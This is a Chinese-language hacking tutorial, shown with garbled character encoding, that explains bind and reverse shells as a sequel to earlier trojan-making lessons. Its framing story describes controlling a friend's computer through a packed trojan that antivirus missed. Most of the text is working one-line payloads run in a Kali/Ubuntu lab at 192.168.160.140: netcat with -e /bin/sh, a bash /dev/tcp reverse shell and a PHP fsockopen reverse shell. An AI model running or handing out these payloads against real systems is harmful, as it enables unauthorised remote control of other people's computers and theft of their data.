雖然我教給了大家木馬的制作,但出于某些原因,我們的計(jì)算機(jī)向?qū)Ψ桨l(fā)出的指令不能被執(zhí)行
這個(gè)時(shí)候,之前所做的一切就都失去了價(jià)值
而為了避免做了無(wú)用功,一些黑客就想了一個(gè)辦法:讓別人來(lái)連接我們。
shell也就應(yīng)運(yùn)而生了
而shell又分為兩種:正向和反向
正向,就是新篁弄小L(我一個(gè)發(fā)?。?/p>
我去她家,讓她的電腦發(fā)一些東西,使她成為服務(wù)端
我再遠(yuǎn)程連接(訪(fǎng)問(wèn)她的電腦)她電腦的數(shù)據(jù)就泄露了
反向,就是新篁跑小L家
下載了一個(gè).exe文件,結(jié)果那是個(gè)加過(guò)殼的木馬,3XX沒(méi)檢測(cè)出來(lái)
于是新篁的電腦就被小L控制了
以下是實(shí)戰(zhàn)(我一般玩木馬,對(duì)潛入別人家里下載東西沒(méi)興趣)
在kali rolling(服務(wù)端)上監(jiān)聽(tīng)23333端口,并反彈shell
nc -lvp 23333 -e /bin/sh
第二步:在ubuntu18(客戶(hù)端)上連接kali rolling的23333端口
這個(gè)時(shí)候,客戶(hù)端就拿到服務(wù)端的shell控制權(quán)了
可以隨意控制服務(wù)端
nc 192.168.160.140 23333
反向shell(客戶(hù)端送shell)
1.ubuntu18上選擇增強(qiáng)版的netcat
一般ubuntu默認(rèn)的是free-bsd版本的nc
update-alternatives --config nc
2.在kali rolling上啟動(dòng)服務(wù)端,等待客戶(hù)端上鉤
客戶(hù)端只要吃鉤子,服務(wù)端就獲得了客戶(hù)端的shell控制權(quán)
可以隨意控制客戶(hù)端
nc -lvp 23333
3.在ubuntu18上啟動(dòng)客戶(hù)端,吃鉤子
nc 192.168.160.140 23333 -e /bin/sh
注:Ubuntu是一個(gè)系統(tǒng),適用于Linux
Ubuntu我之前在VM里運(yùn)行過(guò),界面太小了
bash反彈shell
服務(wù)端(kali rolling上監(jiān)聽(tīng)23333)
客戶(hù)端吃鉤子,服務(wù)端就成功控制客戶(hù)端了
nc -lvp 23333
客戶(hù)端(ubuntu18上bash反彈shell)
bash -i >& /dev/tcp/192.168.160.140/23333 0>&1
php反彈shell
服務(wù)端(kali rolling上監(jiān)聽(tīng)23333)
客戶(hù)端吃鉤子,服務(wù)端就成功控制客戶(hù)端了
客戶(hù)端(ubuntu18上bash反彈shell)
php -r '$f=fsockopen("192.168.160.140",23333);exec("/bin/sh -i <&3 >&3 2>&3");'
反彈shell在安全攻防里算一種主流了
還是有必要記一下的